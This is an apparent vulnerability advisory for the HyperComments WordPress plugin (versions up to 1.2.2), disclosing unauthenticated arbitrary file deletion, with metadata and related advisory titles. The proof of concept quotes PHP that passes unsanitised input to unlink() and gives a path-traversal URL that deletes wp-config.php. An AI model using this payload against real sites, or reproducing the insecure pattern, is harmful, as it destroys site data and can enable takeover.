HyperComments <= 1.2.2 – Unauthenticated Arbitrary File Deletion | Plugin Vulnerabilities

Description

The plugin does not validate and sanitise user input which is being concatenated to create a file path, passed to unlink(), which leads to an arbitrary file deletion issue.

For more details about this issue, please see the reference.

Proof of Concept

File: hypercomments/hypercomments.php:112

$filename = dirname(dirname(dirname(__FILE__))).'/uploads/'.$_GET['xml'];
unlink($filename);


https://example.com/?hc_action=delete_xml&result=success&xml=../../wp-config.php

Affects Plugins

No known fix

References

URL

https://lenonleite.com.br/en/2018/01/08/13-17-wordpress-plugins-with-over-150000-270000-active-downloads-with-the-same-security-issues/

Classification

Type

FILE DELETION

OWASP top 10

A6: Security Misconfiguration

CWE

CVSS

Miscellaneous

Original Researcher

Lenon Leite

Submitter

Lenon Leite

Submitter website

http://www.lenonleite.com.br

Submitter twitter

Verified

No

WPVDB ID

d0ff458f-0a1a-4bae-be50-c11d55813458

Timeline

Publicly Published

2020-10-07 (about 5 years ago)

Added

2020-10-07 (about 5 years ago)

Last Updated

2020-10-08 (about 5 years ago)

Other

Published

Title

Published

2025-05-21

Title

KBx Pro Ultimate < 8.0.5 - Authenticated (Subscriber+) Arbitrary File Deletion

Published

2025-05-07

Title

Event Manager, Events Calendar, Tickets, Registrations – Eventin < 4.0.27 - Unauthenticated Arbitrary File Read

Published

2023-12-26

Title

Media File Renamer < 5.7.8 - Admin+ Remote Code Execution

Published

2025-12-02

Title

Modula 2.13.1 - 2.13.2 - Author+ Arbitrary File Deletion

Published

2026-04-10

Title

wpForo Forum < 3.0.3 - Authenticated (Subscriber+) Arbitrary File Deletion via 'data[body][fileurl]' Parameter